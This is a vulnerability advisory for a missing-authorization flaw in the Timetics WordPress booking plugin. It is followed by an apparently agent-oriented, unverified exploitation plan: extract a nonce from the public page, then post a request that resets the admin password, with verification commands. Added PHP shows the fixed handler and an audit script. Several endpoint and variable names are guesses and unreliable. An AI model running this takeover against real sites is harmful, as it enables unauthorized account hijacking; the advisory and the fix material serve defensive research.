CVE-2026-39432

Timetics – Appointment Booking & Scheduling <= 1.0.53 - Missing Authorization

Severity: Medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 1.0.54
Time to patch: 9d

Description

The Timetics – Appointment Booking & Scheduling plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.0.53. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.0.53
Published: April 7, 2026
Last updated: April 15, 2026
Affected plugin: timetics

What Changed in the Fix

Changes introduced in v1.0.54


Source Code

WordPress.org SVN
Research Plan (Unverified)


Exploitation Research Plan: CVE-2026-39432 (Timetics Missing Authorization)

1. Vulnerability Summary

The Timetics – Appointment Booking & Scheduling plugin (<= 1.0.53) contains a missing authorization vulnerability. Specifically, several administrative functions related to staff management and bookings are exposed via AJAX or REST API endpoints without sufficient capability checks (current_user_can). Because the plugin registers these actions for unauthenticated users (via wp_ajax_nopriv_*) or lacks a proper permission_callback in REST routes, an unauthenticated attacker can perform sensitive actions such as modifying staff details or passwords.

2. Attack Vector Analysis

  • Endpoint: admin-ajax.php (AJAX) or /wp-json/timetics/v1/ (REST API).
  • Vulnerable Action: timetics_staff_password_update (inferred based on JS chunk 0e2a61d8585862c26561.chunk.js).
  • Parameter: staff_id (ID of the user/staff to modify), password (new password), and likely a nonce.
  • Authentication: None Required (PR:N).
  • Preconditions: The attacker must obtain a valid security nonce, which is frequently leaked to unauthenticated users via the frontend booking page.

3. Code Flow

  1. Entry Point: An unauthenticated HTTP request is made to wp-admin/admin-ajax.php with action=timetics_staff_password_update.
  2. Hook: The plugin likely registers add_action('wp_ajax_nopriv_timetics_staff_password_update', ...) or a similar REST route in core/REST/Staff.php (inferred).
  3. Missing Check: The handler function (e.g., update_staff_password) verifies the nonce but fails to verify if the requester has administrative privileges (manage_options).
  4. Sink: The function calls wp_set_password() or updates the user meta/database directly using the provided staff_id.
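The handler shape section 3 describes, as an added illustration that is not code from the Timetics plugin (hook, function and route names are hypothetical): the nonce-only handler beside the form the fix needs, plus a REST route with a real permission_callback. Both registrations are shown for contrast; a real plugin keeps only the AFTER ones.

```php
<?php
// Added illustration, not code from the Timetics plugin. Hook, function and
// route names are hypothetical; only the pattern matches the advisory.

// BEFORE: the handler shape sections 1 and 3 describe. The nonce check passes
// for any visitor who saw the public booking form, and nothing asks whether
// the requester is allowed to edit the targeted user.
function hypo_staff_password_update_before() {
    check_ajax_referer( 'hypo_booking', 'nonce' );
    $staff_id = absint( $_POST['staff_id'] ?? 0 );
    wp_set_password( (string) ( $_POST['password'] ?? '' ), $staff_id ); // sink
    wp_send_json_success( 'Password updated' );
}
// Registered for logged-out visitors too, which is why PR:N applies.
add_action( 'wp_ajax_nopriv_hypo_staff_password_update', 'hypo_staff_password_update_before' );
add_action( 'wp_ajax_hypo_staff_password_update', 'hypo_staff_password_update_before' );

// AFTER: the fix is an authorization check, not a second nonce. The hook is
// registered for authenticated users only, and the capability is checked
// against the specific target user rather than a blanket role.
function hypo_staff_password_update_after() {
    check_ajax_referer( 'hypo_booking', 'nonce' );
    $staff_id = absint( $_POST['staff_id'] ?? 0 );
    if ( ! $staff_id || ! current_user_can( 'edit_user', $staff_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $password = (string) ( $_POST['password'] ?? '' );
    if ( strlen( $password ) < 12 ) {
        wp_send_json_error( 'password too short', 400 );
    }
    wp_set_password( $password, $staff_id );
    wp_send_json_success( 'Password updated' );
}
add_action( 'wp_ajax_hypo_staff_password_update', 'hypo_staff_password_update_after' );

// REST form of the same fix: a state-changing route needs a real
// permission_callback, never __return_true (section 9 mentions the latter).
add_action( 'rest_api_init', function () {
    register_rest_route( 'hypo/v1', '/staff/(?P<id>\d+)/password', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => function ( WP_REST_Request $req ) {
            wp_set_password( (string) $req['password'], (int) $req['id'] );
            return rest_ensure_response( array( 'updated' => true ) );
        },
        'permission_callback' => function ( WP_REST_Request $req ) {
            return current_user_can( 'edit_user', (int) $req['id'] );
        },
    ) );
} );
```

Note that wp_send_json_error() terminates the request, so the sink is never reached for a caller without the capability.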

4. Nonce Acquisition Strategy

The plugin localizes technical parameters for its booking interface. Even unauthenticated users visiting a page with a Timetics booking form can access the nonce.

  1. Identify Shortcode: The plugin uses [timetics] or [timetics_booking] (inferred) to render the booking interface.
  2. Setup: Create a public page containing the shortcode.
  3. Navigation: Use browser_navigate to visit this page.
  4. Extraction: Use browser_eval to extract the nonce from the localized JS object.
    • Variable Name: timetics_params or timetics_admin (inferred).
    • Key: nonce.
    • Command: browser_eval("window.timetics_params?.nonce").

5. Exploitation Strategy

We will attempt to change the password of an existing staff member or administrator.

Step 1: Discover Target User ID

Identify the ID of a target user (e.g., ID 1 for the default admin).

Step 2: Obtain Nonce

As described in section 4, navigate to a page with the Timetics shortcode and extract the nonce.

Step 3: Send Malicious Request

Use the http_request tool to trigger the password update.

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=timetics_staff_password_update&nonce=[NONCE]&staff_id=1&password=PwnedPassword123!
    
    (Note: If the endpoint is REST-based, the URL would be /wp-json/timetics/v1/staff/password-update with a JSON body).

6. Test Data Setup

  1. Install Plugin: Ensure Timetics v1.0.53 is installed.
  2. Create Target: Create a "Staff" member in Timetics (which creates a WP User) or target the existing Admin (ID 1).
  3. Create Public Page:
    wp post create --post_type=page --post_title="Booking" --post_status=publish --post_content='[timetics]'
    

7. Expected Results

  • Response: The server should return a JSON success message (e.g., {"success": true, "data": "Password updated successfully"}).
  • Effect: The user record for staff_id=1 will have its password changed to PwnedPassword123!.

8. Verification Steps

After the exploit attempt, verify the password change using WP-CLI:

wp user check-password admin "PwnedPassword123!"

If the command returns Success: Password correct., the exploitation was successful.

9. Alternative Approaches

If timetics_staff_password_update is not the correct action name:

  1. Grep for Hooks: Use grep -r "wp_ajax_nopriv" wp-content/plugins/timetics to find all unauthenticated AJAX actions.
  2. Check Staff Creation: Attempt to use timetics_create_staff (from JS createStaffApi) to create a new administrative user.
  3. Check REST Routes: Look for register_rest_route in the plugin source and check for routes with permission_callback set to __return_true.
    • Potential route: POST /wp-json/timetics/v1/staff/save
    • Parameters: user_id, user_pass.
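The grep described in section 9, items 1 and 3, as an added review helper that is not part of Timetics or this advisory (file and function names are hypothetical): it lists every statically named wp_ajax_nopriv_ action and every REST route registered with the string '__return_true' as its permission_callback, so each handler can then be checked by hand for a current_user_can() call.

```php
<?php
// Added audit helper (not part of Timetics or this advisory). It only matches
// literal hook names and the string form of __return_true; dynamically built
// names or closures that return true still need a manual read.

function hypo_find_unguarded_registrations( string $source, string $file ): array {
    $findings = array();
    foreach ( explode( "\n", $source ) as $i => $line ) {
        // 1. AJAX actions exposed to visitors who are not logged in.
        if ( preg_match( '/wp_ajax_nopriv_([A-Za-z0-9_]+)/', $line, $m ) ) {
            $findings[] = array( 'file' => $file, 'line' => $i + 1,
                                 'kind' => 'nopriv_ajax', 'name' => $m[1] );
        }
        // 2. REST routes whose permission_callback accepts every request.
        if ( preg_match( "/permission_callback'\s*=>\s*'__return_true'/", $line ) ) {
            $findings[] = array( 'file' => $file, 'line' => $i + 1,
                                 'kind' => 'open_rest_route', 'name' => '' );
        }
    }
    return $findings;
}

// Walk a plugin directory. Usage: php audit.php wp-content/plugins/<plugin>
$dir = $argv[1] ?? '.';
$it  = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $dir ) );
foreach ( $it as $path => $info ) {
    if ( ! $info->isFile() || substr( $path, -4 ) !== '.php' ) {
        continue;
    }
    foreach ( hypo_find_unguarded_registrations( file_get_contents( $path ), $path ) as $f ) {
        printf( "%s:%d %s %s\n", $f['file'], $f['line'], $f['kind'], $f['name'] );
    }
}
```

Every nopriv_ajax hit is expected to be a read-only or intentionally public action; a state-changing handler in that list, or any open_rest_route hit on a POST/PUT/DELETE route, is the pattern this advisory describes.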
